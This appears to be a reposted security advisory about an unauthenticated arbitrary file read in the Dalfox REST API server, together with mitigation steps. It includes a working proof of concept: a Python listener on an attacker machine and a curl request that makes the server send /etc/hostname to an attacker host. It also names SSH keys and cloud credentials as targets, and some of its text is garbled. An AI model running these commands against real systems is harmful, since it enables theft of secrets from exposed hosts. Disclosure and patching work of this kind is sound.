Listen to this Post
How the CVE works (approx 20 lines):
Dalfox REST API server binds to 0.0.0.0:6664 by default with no API key (–api-key defaults to “”). The /scan endpoint accepts JSON with an options field. The custom-payload-file parameter inside options is directly deserialized into model.Options.CustomPayloadFile. This value is passed unchanged through dalfox.Initialize() into the scan engine. In pkg/scanning/scan.go lines 341-366, when skip-discovery is true (attacker-controlled), the engine calls voltFile.ReadLinesOrLiteral(options.CustomPayloadFile). This reads every line from any file path accessible to the dalfox process. Each line becomes an XSS payload embedded into a query parameter (e.g., ?q=
dailycve form:
Platform: Dalfox REST API
Version: All default configs
Vulnerability: Arbitrary file read
Severity: High (7.5)
date: 2026-05-12
Prediction: Vendor patch pending
What Undercode Say:
Analytics – bash commands and codes from
Start receiver on attacker machine
python3 - <<'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
class H(BaseHTTPRequestHandler):
def do_GET(self):
q = parse_qs(urlparse(self.path).query).get('q', [''])[bash]
print("[bash] q =", q, flush=True)
self.send_response(200)
self.end_headers()
HTTPServer(('0.0.0.0', 18081), H).serve_forever()
PY
Start dalfox server (vulnerable)
go run . server --host 0.0.0.0 --port 16664 --type rest
Exfiltrate /etc/hostname
curl -s -X POST http://target:16664/scan \
-H 'Content-Type: application/json' \
--data '{
"url": "http://attacker:18081/?q=test",
"options": {
"custom-payload-file": "/etc/hostname",
"only-custom-payload": true,
"skip-discovery": true,
"param": ["q"],
"use-headless": false,
"worker": 1
}
}'
Exploit:
Send POST /scan with JSON containing attacker-controlled url and options.custom-payload-file set to target file path. Set skip-discovery:true and param:[“q”]. No X-API-Key header needed. Each line of the file is sent as ?q=
Protection from this CVE:
- Strip dangerous fields in postScanHandler: set rq.Options.CustomPayloadFile = “” (and other filesystem fields). 2. Require –api-key at server startup and refuse to run without it. 3. Apply both together.
Impact:
Arbitrary file read on dalfox host: SSH private keys, .env, cloud credentials, /proc/self/environ. No authentication under default config. Exfiltration via outbound HTTP scan traffic. Combined with found-action RCE, attacker can read secrets then execute commands.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

